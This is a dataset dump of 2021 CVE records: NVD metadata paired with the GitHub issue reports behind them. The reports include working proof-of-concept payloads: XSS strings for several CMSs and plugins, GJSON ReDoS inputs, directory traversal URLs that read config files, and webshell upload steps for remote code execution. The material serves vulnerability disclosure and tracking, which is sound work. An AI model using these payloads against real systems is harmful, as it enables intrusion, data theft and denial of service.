"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*",
"matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"120"
] | 120 | https://github.com/nothings/stb/issues/1225 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | **Summary**
stb_image's PNM loader in version v2.27 incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes of non-consec... | In stb_image's PNM reader, loading a specially constructed valid 16-bit PGM file with 4 channels can cause a crash due to an out-of-bounds read | https://api.github.com/repos/nothings/stb/issues/1225/comments | 3 | 2021-10-07T20:08:31Z | 2023-01-29T23:48:18Z | https://github.com/nothings/stb/issues/1225 | 1,020,416,230 | 1,225 | 2,712 |
CVE-2021-42836 | 2021-10-22T18:15:14.897 | GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gjson_project:gjson:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F0248C7-EA4B-42FB-9DEE-EA81C56D563E",
"versionEndExcluding": "1.9.3",
"versionEndIncluding": null,
"versionStartExc... | [
"400"
] | 400 | https://github.com/tidwall/gjson/issues/236 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tidwall",
"gjson"
] | func main() {
testJson := `#[%"*?**?**?**?**?**?***?**?**?**?**?*"""]`
gjson.Get(testJson, testJson)
} | gjson.Get can cause DoS attacks. GJSON <= 1.9.1 allows attackers to cause a redos via crafted JSON input. | https://api.github.com/repos/tidwall/gjson/issues/236/comments | 0 | 2021-10-01T04:53:27Z | 2021-10-04T18:48:58Z | https://github.com/tidwall/gjson/issues/236 | 1,012,886,786 | 236 | 2,713 |
CVE-2021-42836 | 2021-10-22T18:15:14.897 | GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gjson_project:gjson:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F0248C7-EA4B-42FB-9DEE-EA81C56D563E",
"versionEndExcluding": "1.9.3",
"versionEndIncluding": null,
"versionStartExc... | [
"400"
] | 400 | https://github.com/tidwall/gjson/issues/237 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"tidwall",
"gjson"
] | func main() {
testJson := `#[%"*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,,,,,,""*,*"]`
gjson.Get(testJson, testJson)
} | gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input. | https://api.github.com/repos/tidwall/gjson/issues/237/comments | 2 | 2021-10-08T09:28:45Z | 2022-06-09T09:41:39Z | https://github.com/tidwall/gjson/issues/237 | 1,020,889,800 | 237 | 2,714 |
CVE-2021-41172 | 2021-10-26T14:15:08.067 | AS_Redis is an AntSword plugin for Redis. The Redis Manage plugin for AntSword prior to version 0.5 is vulnerable to Self-XSS due to due to insufficient input validation and sanitization via redis server configuration. Self-XSS in the plugin configuration leads to code execution. This issue is patched in version 0.5. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/AntSword-Store/AS_Redis/issues/1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:antsword_redis_project:antsword_redis:*:*:*:*:*:antsword:*:*",
"matchCriteriaId": "BD8189A1-67C4-4BD3-A602-30256D3B5413",
"versionEndExcluding": "0.5",
"versionEndIncluding": null,
... | [
"79"
] | 79 | https://github.com/AntSword-Store/AS_Redis/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"AntSword-Store",
"AS_Redis"
] | Discoverer: cc7v@校长
### Affected
AS_Redis Plugin version <= v0.4
### Fixed
AS_Redis Plugin version >= v0.5
### PoC
```
<img src=1 onerror=alert(1)>
```

### Exploit
Lead to Local Co... | v0.4 Self-XSS in host addr | https://api.github.com/repos/AntSword-Store/AS_Redis/issues/1/comments | 0 | 2021-10-20T07:33:14Z | 2021-10-20T07:35:22Z | https://github.com/AntSword-Store/AS_Redis/issues/1 | 1,031,076,330 | 1 | 2,715 |
CVE-2021-41185 | 2021-10-26T15:15:10.533 | Mycodo is an environmental monitoring and regulation system. An exploit in versions prior to 8.12.7 allows anyone with access to endpoints to download files outside the intended directory. A patch has been applied and a release made. Users should upgrade to version 8.12.7. As a workaround, users may manually apply the ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/commit/23ac5dd422029c2b6ae1701a3599b6d41b66a6a9"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mycodo_project:mycodo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C8B4BD3A-4B47-41A4-84D2-B9E703773D53",
"versionEndExcluding": "8.12.7",
"versionEndIncluding": null,
"versionStart... | [
"22"
] | 22 | https://github.com/kizniche/Mycodo/issues/1105 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kizniche",
"Mycodo"
] | What would be the right contact to report a security vulnerabilty? thanks! | Security Vulnerability | https://api.github.com/repos/kizniche/Mycodo/issues/1105/comments | 8 | 2021-10-25T06:38:07Z | 2021-10-27T02:27:36Z | https://github.com/kizniche/Mycodo/issues/1105 | 1,034,737,651 | 1,105 | 2,716 |
CVE-2020-22864 | 2021-10-26T22:15:08.060 | A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor 3.1.0 allows attackers to execute arbitrary web scripts or HTML. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/froala/wysiwyg-editor/issues/3880"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:froala:froala_editor:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "66771C0F-E1E4-4482-A41E-5DF819031499",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"79"
] | 79 | https://github.com/froala/wysiwyg-editor/issues/3880 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"froala",
"wysiwyg-editor"
] | ##### Steps to reproduce the problem.
1.Go to the Official demo
[https://froala.com/wysiwyg-editor/](url)
2.Click on the [+] button
3.Click on [insert video] button
4.Click on [Embedded Code] button
5.Paste the payload
`<EMBED/SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc... | XSS vulnerability in [insert video] | https://api.github.com/repos/froala/wysiwyg-editor/issues/3880/comments | 13 | 2020-04-16T15:51:52Z | 2022-06-29T18:54:36Z | https://github.com/froala/wysiwyg-editor/issues/3880 | 601,191,526 | 3,880 | 2,717 |
CVE-2020-21250 | 2021-10-27T20:15:07.817 | CSZ CMS v1.2.4 was discovered to contain an arbitrary file upload vulnerability in the component /core/MY_Security.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/22"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "06BDEA94-6AA0-4AC0-B769-F41D2FCCBB5E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"89"
] | 89 | https://github.com/cskaza/cszcms/issues/22 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cskaza",
"cszcms"
] | Hi, @cskaza and I found an arbitrary file upload vulnerability in cszcms-1.2.4. The vulnerable code is on cszcms/core/MY_Security.php file line 47.

I think using the function ‘escape-string’ can solve the sql in... | Time-based blind SQL injection Vulnerability in CSZCMS-1.2.4 | https://api.github.com/repos/cskaza/cszcms/issues/22/comments | 2 | 2019-11-14T06:26:14Z | 2019-11-27T16:27:29Z | https://github.com/cskaza/cszcms/issues/22 | 522,652,620 | 22 | 2,718 |
CVE-2020-22312 | 2021-10-28T15:15:07.027 | A cross-site scripting (XSS) vulnerability was discovered in the OJ/admin-tool /cal_scores.php function of HZNUOJ v1.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wlx65003/HZNUOJ/issues/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hznuoj_project:hznuoj:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D8A15FBC-ADF4-4CD1-9EF9-FC5F7757A08A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"79"
] | 79 | https://github.com/wlx65003/HZNUOJ/issues/17 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wlx65003",
"HZNUOJ"
] |
## description
The code problem occurred in `OJ / admin-tools / cal_scores.php`. The` $ realname` in the output form was obtained from the database. There was no filtering of angle brackets “<>” during registration, which caused the reorganization here. xss injection
 vulnerability in menuedit.php of Mara CMS 7.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "F7300FC2-5DCB-48EC-A420-B10B6E7FE97B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"79"
] | 79 | https://github.com/r0ck3t1973/xss_payload/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"xss_payload"
] | /*Describe the bug*/
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Edit Menu" feature.
To Reproduce
/*Steps to reproduce the behavior*/:
1, Login into the panel
2. Go to '/Mara/codebase/menuedit.php'
3. Insert Payload:
"><strong><script>alert(document.domain)</s... | Cross Site Script Vulnerability on "Edit Menu" in Mara 7.5 | https://api.github.com/repos/r0ck3t1973/xss_payload/issues/2/comments | 0 | 2020-09-01T08:41:16Z | 2021-10-18T15:48:33Z | https://github.com/r0ck3t1973/xss_payload/issues/2 | 689,947,569 | 2 | 2,720 |
CVE-2021-36547 | 2021-10-28T20:15:07.477 | A remote code execution (RCE) vulnerability in the component /codebase/dir.php?type=filenew of Mara v7.5 allows attackers to execute arbitrary commands via a crafted PHP file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/RCE/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "F7300FC2-5DCB-48EC-A420-B10B6E7FE97B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"434"
] | 434 | https://github.com/r0ck3t1973/RCE/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"RCE"
] | /*Describe the bug*/
An attacker could insert any executable code through php via File to execution command in the server
/*To Reproduce*/
1. Log into the panel.
2. Click "File" >> New (Mara/codebase/dir.php?type=filenew)
3. Click File Upload
4. Insert payload php: r0ck3t-1973.php
5. Save and Exit
6. Go to ... | Remote Code Execution via File in Mara version 7.5 | https://api.github.com/repos/r0ck3t1973/RCE/issues/1/comments | 1 | 2020-09-01T08:04:38Z | 2021-11-11T14:11:37Z | https://github.com/r0ck3t1973/RCE/issues/1 | 689,921,362 | 1 | 2,721 |
CVE-2021-36548 | 2021-10-28T20:15:07.533 | A remote code execution (RCE) vulnerability in the component /admin/index.php?id=themes&action=edit_template&filename=blog of Monstra v3.0.4 allows attackers to execute arbitrary commands via a crafted PHP file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/monstra-cms/monstra/issues/470"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thir... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "13838C95-223E-4896-AA83-B437EFD45660",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"434"
] | 434 | https://github.com/monstra-cms/monstra/issues/470 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"monstra-cms",
"monstra"
] | Describe the bug
An attacker could insert any executable code through php via Theme Blog to execution command in the server
To Reproduce
1. Log into the panel.
2. Go to "/monstra-3.0.4/admin/index.php?id=themes&action=edit_template&filename=blog"
3. Click edit Blog
4. Insert payload easy-simple-php-webshell.p... | RCE (Remote Code Execution via Theme Blog Monstra version 3.0.4) | https://api.github.com/repos/monstra-cms/monstra/issues/470/comments | 0 | 2021-07-05T02:51:41Z | 2021-10-29T15:41:57Z | https://github.com/monstra-cms/monstra/issues/470 | 936,628,926 | 470 | 2,722 |
CVE-2021-36550 | 2021-10-28T20:15:07.580 | TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-browse_categories.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Create category module. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:21.4:*:*:*:*:*:*:*",
"matchCriteriaId": "0F0B82A2-9FBD-4157-9961-2F3EC8C3F1B1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"79"
] | 79 | https://github.com/r0ck3t1973/xss_payload/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"xss_payload"
] | Hi, I found stored xss in Categories.
To Reproduce
1. Login into the panel
2. Go to Documents: 'tiki-21.4/tiki-index.php'
3. Click Categories: '/tiki-21.4/tiki-browse_categories.php'
4. Create category
5. insert payload bypass xss:
`<a href="javascript:alert(1337)">Click2</a>`
7. Click Categorie... | Bypass Cross Site Script Vulnerability on "Categories" in TikiWiki version 21.4 | https://api.github.com/repos/r0ck3t1973/xss_payload/issues/6/comments | 0 | 2021-07-07T12:52:26Z | 2021-07-07T12:54:28Z | https://github.com/r0ck3t1973/xss_payload/issues/6 | 938,860,743 | 6 | 2,723 |
CVE-2021-36551 | 2021-10-28T20:15:07.627 | TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-calendar.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Add Event module. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:21.4:*:*:*:*:*:*:*",
"matchCriteriaId": "0F0B82A2-9FBD-4157-9961-2F3EC8C3F1B1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"79"
] | 79 | https://github.com/r0ck3t1973/xss_payload/issues/7 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"xss_payload"
] | Hi Team,
I found stored xss in Calendar
To Reproduce
1. Login into panel
2. Go to Documents: '/tiki-21.4/tiki-index.php'
3. Click Calendar: '/tiki-21.4/tiki-calendar.php'
4. Click Add Event
5. insert payload bypass xss in Description
`<a href="javascript:alert(document.domain)">Click Here... | Bypass Cross Site Script Vulnerability on "Calendar" in TikiWiki version 21.4 | https://api.github.com/repos/r0ck3t1973/xss_payload/issues/7/comments | 0 | 2021-07-07T12:53:38Z | 2021-07-07T12:53:38Z | https://github.com/r0ck3t1973/xss_payload/issues/7 | 938,861,903 | 7 | 2,724 |
CVE-2021-25742 | 2021-10-29T04:15:08.220 | A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL"... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/ingress-nginx/issues/7837"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Mitigation... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CEC0CA26-0429-4DD1-904B-5C7637C42704",
"versionEndExcluding": "0.49.1",
"versionEndIncluding": null,
"versionSt... | [
"20"
] | 20 | https://github.com/kubernetes/ingress-nginx/issues/7837 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"kubernetes",
"ingress-nginx"
] | ### Issue Details
A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster.
This issue has been rated **High** ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L](https://www.first.org/cvss/calculator... | CVE-2021-25742: Ingress-nginx custom snippets allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces | https://api.github.com/repos/kubernetes/kubernetes/issues/126811/comments | 63 | 2021-10-21T16:08:21Z | 2024-08-20T13:17:02Z | https://github.com/kubernetes/kubernetes/issues/126811 | 2,475,614,887 | 126,811 | 2,725 |
CVE-2021-41189 | 2021-10-29T18:15:08.167 | DSpace is an open source turnkey repository application. In version 7.0, any community or collection administrator can escalate their permission up to become system administrator. This vulnerability only exists in 7.0 and does not impact 6.x or below. This issue is patched in version 7.1. As a workaround, users of 7.0 ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DSpace/DSpace/commit/277b499a5cd3a4f5eb2370513a1b7e4ec2a6e041"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Ad... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:duraspace:dspace:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EC2273B4-D6B6-4968-BF9A-65812B5799A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"863"
] | 863 | https://github.com/DSpace/DSpace/issues/7928 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"DSpace",
"DSpace"
] | **Describe the bug**
The "Anonymous" group has the "Articles" collection as linked object:
[https://api7.dspace.org/server/api/eperson/groups/f2c7eb75-aec0-4604-ab7f-6676723818ad/object](https://api7.dspace.org/server/api/eperson/groups/f2c7eb75-aec0-4604-ab7f-6676723818ad/object)
This is not true, as it's not a `CO... | REST service returns wrong object for the "Anonymous" group | https://api.github.com/repos/DSpace/DSpace/issues/7928/comments | 2 | 2021-09-02T14:01:40Z | 2021-10-26T16:39:32Z | https://github.com/DSpace/DSpace/issues/7928 | 986,773,109 | 7,928 | 2,726 |
CVE-2020-25872 | 2021-10-29T20:15:07.747 | A vulnerability exists within the FileManagerController.php function in FrogCMS 0.9.5 which allows an attacker to perform a directory traversal attack via a GET request urlencode parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/philippe/FrogCMS/issues/34"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Pa... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:frogcms_project:frogcms:0.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B03397C-68B4-4C54-B001-8B5BC5FE427A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"22"
] | 22 | https://github.com/philippe/FrogCMS/issues/34 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"philippe",
"FrogCMS"
] | There is a directory traversal vulnerability when logined as a admin and view the uploaded files.An attacker can read arbitrarily file on a remote server via GET request urlencode parameter.
1.Read config.php.
```
http://127.0.0.1:8888/FrogCMS/admin/?/plugin/file_manager/view/.%2f%2f./config.php
```

{
$d = base64_decode($_GP['id']);
$path = WEB_ROOT . '/conf... | baijiacmsV4 directory traversal vulnerability | https://api.github.com/repos/baijiacms/baijiacmsV4/issues/6/comments | 0 | 2020-09-19T08:11:29Z | 2020-09-19T08:11:29Z | https://github.com/baijiacms/baijiacmsV4/issues/6 | 704,832,797 | 6 | 2,728 |
CVE-2020-25881 | 2021-10-29T20:15:08.220 | A vulnerability was discovered in the filename parameter in pathindex.php?r=cms-backend/attachment/delete&sub=&filename=../../../../111.txt&filetype=image/jpeg of the master version of RKCMS. This vulnerability allows for an attacker to perform a directory traversal via a crafted .txt file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.ranko.cn/index.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://gitee.com/wuxi_ranko/cms"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ranko:rkcms:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C6F02F3E-07F3-4477-8228-52FF777F3CE8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nu... | [
"22"
] | 22 | https://github.com/AubreyJun/cms/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"AubreyJun",
"cms"
] | ### 1 Deploy the RKCMS locally
### 2 Create a file, such as 111.txt

### 3 Log in the application
### 4 Delete a attachment,apture this packet ,change the filename parameter to ../../../../111.txt,submit this ... | There is a directory traversal vulnerability at attachment deletion | https://api.github.com/repos/AubreyJun/cms/issues/2/comments | 0 | 2020-09-15T10:19:11Z | 2020-09-15T10:19:11Z | https://github.com/AubreyJun/cms/issues/2 | 701,804,336 | 2 | 2,729 |
CVE-2020-25911 | 2021-10-31T19:15:09.780 | A XML External Entity (XXE) vulnerability was discovered in the modRestServiceRequest component in MODX CMS 2.7.3 which can lead to an information disclosure or denial of service (DOS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/dahua966/Vul_disclose/blob/main/XXE_modxcms.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/m... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modx:modx_revolution:2.7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "846F6D4B-F455-4BCE-A756-7F1B0FE02456",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"611"
